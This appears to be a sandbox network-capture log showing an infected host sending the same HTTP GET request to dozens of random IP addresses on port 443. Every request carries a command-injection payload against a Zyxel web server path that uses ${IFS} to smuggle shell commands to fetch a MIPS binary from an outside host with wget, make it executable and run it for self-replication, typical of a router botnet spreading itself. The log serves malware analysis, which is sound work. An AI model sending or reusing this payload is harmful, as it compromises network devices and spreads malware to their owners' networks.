                                          Jan 14, 2024 15:46:04.771100044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1691192.168.2.2337076164.10.251.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771141052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1692192.168.2.235965874.210.71.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771172047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1693192.168.2.234540017.57.133.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771183014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1694192.168.2.2337020191.163.234.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771260977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1695192.168.2.2332926133.248.26.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771287918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1696192.168.2.2334348217.169.184.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771310091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1697192.168.2.233307882.40.190.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771317959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1698192.168.2.233653667.84.164.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771378994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1699192.168.2.2354176154.46.120.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771394968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1700192.168.2.2342582212.251.168.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771424055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1701192.168.2.2357736194.217.20.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771456957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1702192.168.2.236087859.251.176.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771473885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1703192.168.2.2334918134.13.144.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771500111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1704192.168.2.234767079.70.85.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771569014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1705192.168.2.2353760105.140.90.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771596909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1706192.168.2.2341142197.120.214.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771629095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1707192.168.2.234327486.38.80.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771672010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1708192.168.2.233790024.153.119.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771728039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1709192.168.2.233578298.192.250.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771733999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1710192.168.2.2349490200.150.117.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771754026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1711192.168.2.2342774199.106.27.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771783113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1712192.168.2.235028851.146.145.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771851063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1713192.168.2.235665697.127.205.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771883011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1714192.168.2.2356054147.201.190.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771908045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1715192.168.2.2339218137.182.88.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771945953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1716192.168.2.2355370175.232.208.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.771979094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1717192.168.2.235897050.54.187.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772021055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1718192.168.2.2336556210.157.120.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772038937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1719192.168.2.2332948157.217.127.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772056103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1720192.168.2.2342354110.248.94.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772128105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1721192.168.2.236098088.163.125.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772192001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1722192.168.2.233650031.93.21.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772202969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1723192.168.2.2348444218.27.150.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772234917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1724192.168.2.234951882.97.224.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772263050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1725192.168.2.235010660.50.112.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772311926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1726192.168.2.2355834139.122.176.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772346973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1727192.168.2.234667698.195.175.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772387981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1728192.168.2.2352434194.181.92.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772418022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1729192.168.2.235699075.169.140.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772437096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1730192.168.2.2348302221.226.49.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772473097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1731192.168.2.2354768179.24.2.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772490978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1732192.168.2.2337724140.207.41.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772516012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1733192.168.2.2338856175.94.50.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772579908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1734192.168.2.233582085.18.46.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772627115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1735192.168.2.2345300122.190.88.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772633076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1736192.168.2.2358548118.97.7.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772695065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1737192.168.2.2336010115.198.31.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772716045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1738192.168.2.235482871.192.46.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772736073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1739192.168.2.2342716145.83.159.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772752047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1740192.168.2.235735694.167.152.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772789001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1741192.168.2.234532299.191.202.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772844076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1742192.168.2.2356950149.242.199.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772877932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1743192.168.2.2333648107.44.187.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772907019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1744192.168.2.2354742190.20.228.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772913933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1745192.168.2.234868461.251.213.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.772952080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1746192.168.2.235054898.209.27.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773035049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1747192.168.2.2352522220.19.231.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773062944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1748192.168.2.2355228160.173.232.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773062944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1749192.168.2.2336762161.176.141.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773129940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1750192.168.2.2346722135.199.222.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773129940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1751192.168.2.2349810116.226.165.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773156881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1752192.168.2.2354036178.241.192.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.773195028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1753192.168.2.2351436152.115.157.144443
                                          TimestampBytes transferredDirectionData
